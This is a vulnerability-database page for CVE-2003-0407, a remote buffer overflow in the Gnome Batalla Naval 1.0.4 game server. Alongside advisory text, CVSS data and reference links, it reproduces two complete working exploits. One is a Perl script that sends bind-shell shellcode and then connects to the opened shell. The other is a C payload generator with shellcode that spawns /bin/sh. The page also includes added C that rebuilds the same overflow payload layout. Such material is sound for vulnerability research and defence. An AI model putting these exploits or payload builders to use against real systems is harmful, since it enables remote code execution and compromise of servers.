CVE-2003-0407
CVSS 10.0
Published: 2003-06-30 00:00:00
Revised: 2016-10-17 22:33:36
NMCOES    

[Original] Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attackers to execute arbitrary code via a long connection string.


[CNNVD] Batalla Naval Remote Buffer Overflow Vulnerability (CNNVD-200306-122)

        A buffer overflow exists in gbnserver in Gnome Batalla Naval 1.0.4. A remote attacker can execute arbitrary code by supplying an overly long connection string.
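The page does not show gbnserver's source, so the following is an added illustrative model of the bug class described here (an unbounded copy of a client-supplied connection string into a fixed-size stack buffer) next to a bounded handler that fails closed. It is not the project's code; the buffer size, the function names and the connection-string format are assumptions.

```c
/* Added illustrative example, not gbnserver's code: a model of the bug class
 * (unbounded copy of a client-supplied connection string into a fixed stack
 * buffer) next to a bounded handler that rejects over-long input.
 * Buffer size, function names and the greeting format are assumptions. */
#include <stdio.h>
#include <string.h>

#define CONN_NAME_MAX 64      /* assumed size of the fixed stack buffer */

/* Vulnerable pattern: strcpy() copies until the source NUL, whatever the
 * length, so a string longer than CONN_NAME_MAX-1 bytes overwrites what lies
 * after `name` on the stack (saved registers, the return address).
 * Shown for contrast only; never call it with untrusted input. */
void handle_connect_unsafe(const char *conn_str)
{
    char name[CONN_NAME_MAX];
    strcpy(name, conn_str);                   /* no bound check at all */
    printf("player %s joined\n", name);
}

/* Hardened handler: the destination size decides how much is read, the
 * string is rejected if it does not fit together with its NUL, and only
 * then is it copied.  Returns 0 on success and -1 if the string is too long
 * (the caller should drop the connection).  `out` must hold CONN_NAME_MAX. */
int handle_connect_safe(const char *conn_str, char *out)
{
    size_t len = 0;
    /* bounded scan: never look further than the buffer could hold */
    while (len < CONN_NAME_MAX && conn_str[len] != '\0')
        len++;
    if (len == CONN_NAME_MAX)
        return -1;                            /* no room for the NUL */
    memcpy(out, conn_str, len);
    out[len] = '\0';
    return 0;
}

/* The boundary condition itself: would strcpy() of this string write past a
 * buffer of `bufsize` bytes?  Returns 1 if so, 0 otherwise. */
int strcpy_overflows(const char *conn_str, size_t bufsize)
{
    return strlen(conn_str) + 1 > bufsize;
}
```

The unsafe variant is kept only for contrast: strcpy() takes no length, so the number of bytes written is decided entirely by the client, which is the boundary error the advisories refer to. The safe variant derives the limit from the destination first, so an over-long string is refused before a single byte is written.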

- CVSS (base score)

CVSS score: 10.0 [HIGH]
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete
Access complexity: Low
Access vector: Network
Authentication: None
(CVSS v2 vector AV:N/AC:L/Au:N/C:C/I:C/A:C; it is the only v2 vector that scores exactly 10.0, so these metrics follow from the base score above)

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0407
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0407
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-122
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=105405668423102&w=2
(UNKNOWN)  BUGTRAQ  20030526 [Priv8security_Advisory]_Batalla_Naval_remote_overflow
http://www.iss.net/security_center/static/12087.php
(VENDOR_ADVISORY)  XF  batalla-naval-bo(12087)
http://www.securityfocus.com/bid/7699
(VENDOR_ADVISORY)  BID  7699

- Vulnerability information

Batalla Naval Remote Buffer Overflow Vulnerability
Critical   Buffer overflow
Published: 2003-06-30 00:00:00   Updated: 2005-10-20 00:00:00
Remote
        A buffer overflow exists in gbnserver in Gnome Batalla Naval 1.0.4. A remote attacker can execute arbitrary code by supplying an overly long connection string.

- Advisories and patches

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (22658)

Batalla Naval 1.0.4 Remote Buffer Overflow Vulnerability (1) (EDBID:22658)
linux remote
2003-05-26 Verified
0 wsxz
N/A
source: http://www.securityfocus.com/bid/7699/info

Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server. 

#!/usr/bin/perl
# Priv8security.com remote exploit for Gnome Batalla Naval Server v1.0.4
#
#    Game url http://batnav.sourceforge.net/
#    Tested against Mandrake 9.0
#
#    [wsxz@localhost buffer]$ perl priv8gbn.pl 127.0.0.1
#    Connected!
#    [+] Using ret address: 0xbffff3a2
#    [+] Using got address: 0x804f8dc
#    [+] Sending stuff...
#    [+] Done ;pPPp
#    [?] Now lets see if we got a shell...
#    [+] Enjoy your stay on this server =)
#    Linux wsxz.box 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003
i686 unknown unknown GNU/Linux
#    uid=503(wsxz) gid=503(wsxz) groups=503(wsxz)
#

use IO::Socket;
if (@ARGV < 1 || @ARGV > 3) {
print "-= Priv8security.com remote gbatnav-1.0.4 server on linux =-\n";
print "Usage: perl $0 <host> <port=1995> <offset=100>\n";
exit;
}
if (@ARGV >= 2) {
$port = $ARGV[1];
$offset = defined $ARGV[2] ? $ARGV[2] : 0;   # offset is optional; default 0
} else {
$port = 1995;
$offset = 0;
}
$shellcode = #bind shellcode port 5074 by s0t4ipv6@shellcode.com.ar
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66".
"\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1".
"\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04".
"\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66".
"\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6".
"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53".
"\x89\xe1\xb0\x0b\xcd\x80";

$ret = 0xbffff3a2; # ret mdk 9.0
$gotaddr = 0x0804f8dc; #objdump -R ./gbnserver | grep strcpy
$new_ret = pack('l', ($ret + $offset));
$new_got = pack('l', ($gotaddr));
$buffer = "\x90" x (500 - length($shellcode));   # NOP sled pads the first 500 bytes
$buffer .= $shellcode;
$buffer .= $new_got;
$buffer .= $new_ret x 20;



$f = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$ARGV[0],PeerPort=>$port)
or die "Cant connect to server or port...\n";

print "Connected!\n";
print "[+] Using ret address: 0x", sprintf('%lx',($ret)), "\n";
print "[+] Using got address: 0x", sprintf('%lx',($gotaddr)), "\n";
print "[+] Sending stuff...\n";
print $f "$buffer\r\n\r\n";
print "[+] Done ;pPPp\n";
print "[?] Now lets see if we got a shell...\n";
close($f);

$handle = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$ARGV[0],PeerPort=>5074,Type=>SOCK_STREAM,Reuse=>1)
or die "[-] No luck, try next time ok ...\n";

print "[+] Enjoy your stay on this server =)\n";

$handle->autoflush(1);
print $handle "uname -a;id\n";

# split the program into two processes, identical twins
die "cant fork: $!" unless defined($kidpid = fork());

# the if{} block runs only in the parent process
if ($kidpid) {
    # copy the socket to standard output
    while (defined ($line = <$handle>)) {
        print STDOUT $line;
    }
    kill("TERM", $kidpid);  # send SIGTERM to child
}
# the else{} block runs only in the child process
else {
    # copy standard input to the socket
    while (defined ($line = <STDIN>)) {
        print $handle $line;
    }
}

- Vulnerability information (22659)

Batalla Naval 1.0.4 Remote Buffer Overflow Vulnerability (2) (EDBID:22659)
linux remote
2003-05-26 Verified
0 jsk
N/A
source: http://www.securityfocus.com/bid/7699/info

Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server. 

/*
 * by jsk: gbnserver remote exploit demo
 * example: (./gbnex; cat) | nc 127.0.0.1 1995
 *   Ctrl-C
 *   ./nc 127.0.0.1 30464
 *   id
 *   uid=508(sa2) gid=508(sa2) groups=508(sa2)
 * 2003-6-2
 * welcome to http://www.ph4nt0m.net & www.patching.net
 * thanks warning3
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>   /* u_char */

#define NOP        0x90

#define OFFSET     100

#define bufsize    584

char shellcode[] =

        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\xcd\x80"                      /* int $0x80             */
        "\x85\xc0"                      /* testl %eax,%eax       */
        "\x75\x43"                      /* jne 0x43              */
        "\xeb\x43"                      /* jmp 0x43              */
        "\x5e"                          /* popl %esi             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\x89\xf1"                      /* movl %esi,%ecx        */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\xb0\x06"                      /* movb $0x6,%al         */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x01"                      /* movb $0x1,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb0\x02"                      /* movb $0x2,%al         */
        "\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
        "\xb0\x77"                      /* movb $0x77,%al        */
        "\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
        "\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
        "\xb0\x10"                      /* movb $0x10,%al        */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x02"                      /* movb $0x2,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xeb\x04"                      /* jmp 0x4               */
        "\xeb\x55"                      /* jmp 0x55              */
        "\xeb\x5b"                      /* jmp 0x5b              */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x04"                      /* movb $0x4,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
        "\xb0\x66"                      /* movb $0x66,%al        */
        "\xb3\x05"                      /* movb $0x5,%bl         */
        "\xcd\x80"                      /* int $0x80             */
        "\x88\xc3"                      /* movb %al,%bl          */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\x31\xc9"                      /* xorl %ecx,%ecx        */
        "\xcd\x80"                      /* int $0x80             */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\xb1\x01"                      /* movb $0x1,%cl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xb0\x3f"                      /* movb $0x3f,%al        */
        "\xb1\x02"                      /* movb $0x2,%cl         */
        "\xcd\x80"                      /* int $0x80             */
        "\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
        "\x89\x06"                      /* movl %eax,(%esi)      */
        "\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
        "\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
        "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
        "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
        "\xb0\x0b"                      /* movb $0xb,%al         */
        "\x89\xf3"                      /* movl %esi,%ebx        */
        "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
        "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
        "\xcd\x80"                      /* int $0x80             */
        "\x31\xc0"                      /* xorl %eax,%eax        */
        "\xb0\x01"                      /* movb $0x1,%al         */
        "\x31\xdb"                      /* xorl %ebx,%ebx        */
        "\xcd\x80"                      /* int $0x80             */
        "\xe8\x5b\xff\xff\xff";

int main(void)
{
    unsigned int ret = 0xbfffde8c;   /* guessed return address (original author's value) */
    int i;
    u_char buf[bufsize];

    /* whole buffer starts as a NOP sled */
    memset(buf, NOP, bufsize);

    /* shellcode sits immediately below the 21 copies of the return address */
    memcpy(&buf[bufsize - (strlen(shellcode) + 21 * sizeof(ret))],
           shellcode, strlen(shellcode));

    /* overwrite the saved return address (and the slack around it) 21 times */
    for (i = 1; i <= 21; i++)
        memcpy(&buf[bufsize - (i * sizeof(ret))], &ret, sizeof(ret));

    /* buf is not NUL-terminated, so emit it by length rather than with %s */
    fwrite(buf, 1, bufsize, stdout);
    putchar('\n');
    return 0;
}
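Both exploits above build the same 584-byte overflow string: a NOP sled and shellcode in the first 500 bytes, then (in the Perl version) the GOT slot of strcpy, then repeated copies of the guessed return address. The following added example, which is not part of either exploit, factors that layout into a builder and adds the check a strcpy()-driven overflow needs: the payload must not contain a 0x00 byte, because strcpy() stops at the first NUL. The eight shellcode bytes in the test are a constructed placeholder, not the page's bind shells; SLED_LEN, build_payload and first_nul are names introduced here.

```c
/* Added example (not part of either exploit above): builds the overflow
 * layout both exploits use, NOP sled + shellcode, optional GOT address, then
 * N copies of the return address, and checks the constraint a strcpy()-driven
 * overflow imposes: no 0x00 byte anywhere, since strcpy() stops at the first
 * NUL.  SLED_LEN, build_payload and first_nul are names introduced here. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define SLED_LEN 500   /* NOP sled + shellcode fill the first 500 bytes, as in the Perl exploit */
#define NOP 0x90

/* write a 32-bit value little-endian (x86 byte order) */
static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = v & 0xff;
    p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff;
    p[3] = (v >> 24) & 0xff;
}

/* Layout: [NOP x (SLED_LEN - sclen)] [shellcode] [got, if nonzero] [ret x nret]
 * Returns the payload length, or 0 if the shellcode does not fit in the sled
 * or the output buffer is too small. */
size_t build_payload(uint8_t *out, size_t cap,
                     const uint8_t *sc, size_t sclen,
                     uint32_t got, uint32_t ret, int nret)
{
    size_t len = SLED_LEN + (got ? 4 : 0) + 4 * (size_t)nret;
    size_t i;

    if (sclen > SLED_LEN || len > cap)
        return 0;
    memset(out, NOP, SLED_LEN - sclen);           /* sled */
    memcpy(out + SLED_LEN - sclen, sc, sclen);    /* shellcode ends at byte 500 */
    i = SLED_LEN;
    if (got) {                                    /* GOT slot, Perl variant only */
        put_le32(out + i, got);
        i += 4;
    }
    for (; nret > 0; nret--, i += 4)              /* repeated return address */
        put_le32(out + i, ret);
    return len;
}

/* strcpy() stops at NUL, so any 0x00 in the payload truncates the overflow
 * there.  Returns the index of the first NUL, or -1 if the payload is clean. */
long first_nul(const uint8_t *buf, size_t len)
{
    const uint8_t *p = memchr(buf, 0, len);
    return p ? (long)(p - buf) : -1;
}
```

With the Perl exploit's own parameters (GOT 0x0804f8dc, return address 0xbffff3a2, 20 copies) the builder yields 500 + 4 + 80 = 584 bytes, the same bufsize the C exploit reaches with 21 copies of 0xbfffde8c and no GOT entry. Both addresses happen to be NUL-free; a return address such as 0xbfff0000 would be cut off by strcpy() at byte 500, which the NUL check reports. If the server also reads line-wise (the Perl exploit terminates its send with \r\n\r\n, but the page does not show the server's read loop), the same scan can be extended to 0x0a and 0x0d.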

- Vulnerability information

6553
Gnome Batalla Naval gbnserver Remote Overflow
Location: Remote / Network Access   Attack type: Denial of Service, Input Manipulation
Impact: Loss of Integrity, Loss of Availability
Exploit: Public

- Vulnerability description

A remote overflow exists in Gnome Batalla Naval gbnserver. The issue is due to a boundary error in gbnserver. By sending an overly long string, an attacker can cause a buffer overflow and crash the server or execute arbitrary code with game server user privileges, resulting in a loss of integrity.

- Timeline

2003-05-26 Unknown
2003-05-26 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

- Vulnerability information

Batalla Naval Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error   BID: 7699
Remote: Yes   Local: No
Published: 2003-05-26 12:00:00   Updated: 2009-07-11 10:06:00
Discovery of this issue is credited to Wsxz <wsxz@priv8security.com>.

- Affected program versions

Batalla Naval 1.0.4

- Vulnerability discussion

Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server.

- Exploit

The following exploits were provided by Wsxz <wsxz@priv8security.com> and yan feng <yfjsk1982@yahoo.com.cn> respectively:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's own websites